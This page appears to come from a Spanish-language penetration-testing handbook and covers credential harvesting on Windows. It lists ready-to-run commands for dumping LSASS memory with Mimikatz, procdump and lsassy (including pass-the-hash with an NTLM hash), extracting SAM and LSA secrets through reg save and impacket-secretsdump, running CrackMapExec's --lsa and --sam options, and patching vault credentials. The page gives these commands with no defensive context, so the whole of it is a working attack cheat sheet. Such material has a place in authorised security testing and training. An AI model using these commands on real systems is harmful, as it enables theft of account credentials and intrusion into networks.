3. Obtención de credenciales

3.1. Herramientas

Mimikatz

mimikatz.exe
Invoke-Mimikatz.ps1
SharpKatz.exe
pypykatz.exe

3.2. Credenciales en memoria (LSASS)

MimiKatz

Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

CrackMapExec

crackmapexec smb <IP> -u <USER> -p <PASS> --lsa

procdump

1- Get-Process -Name LSASS
2- .\\procdump.exe -ma <ProcNum> lsass.dmp

lsassy

lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users

3.3. Credenciales locales (SAM)

SecretDump

1- reg save HKLM\\sam sam
2- reg save HKLM\\system system
3- reg save HKLM\\security security
4- impacket-secretsdump -sam sam -security security -system system LOCAL

MimiKatz

 Invoke-Mimikatz -Command '"lsadump::sam"'

CrackMapExec

crackmapexec smb <IP> -u <USER> -p <PASS> --sam

3.4. Tareas programadas

MimiKatz

 Invoke-Mimikatz -Command '"vault::cred /patch"'

Previous2. Vector de entradaNext4. Spraying

Last updated